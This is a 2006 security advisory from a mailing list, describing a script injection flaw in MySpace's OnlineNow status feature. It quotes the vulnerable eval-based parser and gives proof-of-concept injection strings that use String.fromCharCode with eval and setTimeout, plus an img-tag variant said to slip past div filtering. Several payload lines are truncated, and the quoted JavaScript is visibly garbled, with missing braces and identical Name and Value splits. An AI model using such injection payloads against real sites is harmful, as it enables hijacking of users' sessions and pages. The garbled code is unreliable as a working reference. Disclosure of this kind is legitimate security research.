Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Myspace.com - Intricate Script Injection
Date: Sun Apr 09 2006 - 17:31:18 CDT
Myspace.com - Intricate Script Injection Vulnerability
Reported April 5th, 2006
Script Injection Within the OnlineNow Mechanism
The OnlineNow Mechanism:
Within almost every page on the website there are embedded scripts that define the functions and objects necessary to dynamically provide online/offline status of users on Myspace. Within the provided HTML there are specific <div> tags that are to be handled by the functions. They are typically placed underneath the picture of the "friend" and passes the specific friendID of the the friend to the OnlineNow functions. An example of such a tag is as follows:
<div style="width: 80px; height: 20px;" id="UserDataNode0" class="DataPoint=OnlineNow;UserID=17601323;"></div>
The ID of these tags follows the format of 'UserDataNodeN' - where the value of N increases in sequential order from 0 to (the number of tags - 1). At the end of the HTML the OnlineNow mechanism is called which finds all the tags, parses out all the UserIDs specified in the class property and passes them to an iframe which calls on a web-application that returns a true/false value specifying whether that FriendID is found to be "online now". The flow of code proceeds to then find all of these friendIDs that were found to be online and set the DIV tag's innerHTML to display an image that shows the user is online within the browser display.
The OnlineNow Vulnerability:
There is a script injection vulnerability within this mechanism specifically found during the searching and parsing of the <div> tags. I will be extensively referencing the function _OnlineNowNodeParser_locateNodes() found in OnlineNowNodeParser.js. A copy of the function will be placed here for such reference:
var CurrentNode = null;
var i = 0;
while ((CurrentNode = document.getElementById("UserDataNode" + i)) != null)
NodeIndex = this.NodeArray.length;
this.NodeArray[NodeIndex] = new Object();
this.NodeArray[NodeIndex].NodeID = CurrentNode.id;
var Attributes = CurrentNode.className.split(";");
for (var AttributeIterator = 0; AttributeIterator < Attributes.length; AttributeIterator++)
var Name = Attributes[AttributeIterator].split("=");
var Value = Attributes[AttributeIterator].split("=");
if (Name != "" && Value != "") eval("this.NodeArray[" + NodeIndex + "]." + Name + "=\"" + Value + "\";");
What is going on here is the function initiates a loop starting from i = 0 which checks for the existence of an element with an ID with the format "UserDataNode" + i. It then splits the semicolon delimited class property and extracts a Name and Value combination from the format Name=Value (i.e.
<div id="UserDataNode0" class='UserID=17601323"+String.fromCharCode(59)+";'></div>
This will generate a call to the eval() function in the following manner:
The function - String.fromCharCode(118,97,114,32,119,61,51,59,97,108,101,114,116,40,119
,41,59) returns the string "var w=3;alert(w);"
By compounding this with eval() as so:
A variable 'w' will be defined with value 3 and a messagebox will display it's value. The following tag - when passed to our locateNodes() function - will execute the aforementioned line of code:
<div id="UserDataNode0" class='UserID=17601323"+eval(String.fromCharCode(118,97,114,32,119,61,51
in that the timer function has a seperate thread it executes in which is important in considering race-type conditions) and is NOT filtered by Myspace. The following tag when placed within the realms of Myspace will execute the line
document.location="http://www.google.com"; (the actual script to be injected with this exploit is completely arbitrary and without limitations):
<div id="UserDataNode0" class='UserID=17601323"+setTimeout(String.fromCharCode(100,111,99,117,10
Additional Commentary On Exploit Development:
I'd like to make additional notes about exploit development. Even though I've stuck with using the <div> element in describing the vulnerability and writing the exploit - it should be apparent by those who look at the function that the element is not found by the the type of tag but solely by the ID property (using getElementByID). Knowing this - the exploit can use ANY element tag (not <div> alone) for they only need to specify the ID as having the "UserDataNodeN" tag. If Myspace were to start filtering <div> tags in the face of this vulnerability - it would not correctly patch it. One can just as easily used the allowed <img> tag to exploit the vulnerability like so:
<img id="UserDataNode0" class='UserID=17601323"+setTimeout(String.fromCharCode(100,111,99,117,10
Conclusion and Overview
The security consciousness within Myspace.com appears to be poor to say to the least. In my own experiences of trying to touchbase with the right people and trying to work with them in strengthening security - my motions were not accepted with any kindness most times and at others had not been acknowledged at all. It would seem that very few people on staff have any degree of understanding of the seriousness of vulnerabilities within a social network that stores information on millions of people, with millions of active users, and a huge YOUNG demographic - and any that do seem to make themselves out of reach.
It is my own opinion that, esspecially amidst the attention they have been getting in the media with predators using Myspace as a tool to target children and incidents of child pornography found within the domain, they would have an exceptional interest and concern for the security of it's users. If security cannot be addressed within Myspace there are a great number of just as good clones that provide more attention to this issue. Such alternatives as Tagworld.com have been getting an increase in popularity due to its integrity and better model. I do not know of reports in auditing Tagworld or others, but it would be worth it to look into these alternatives to find a company that could provide a social experience without providing a security threat.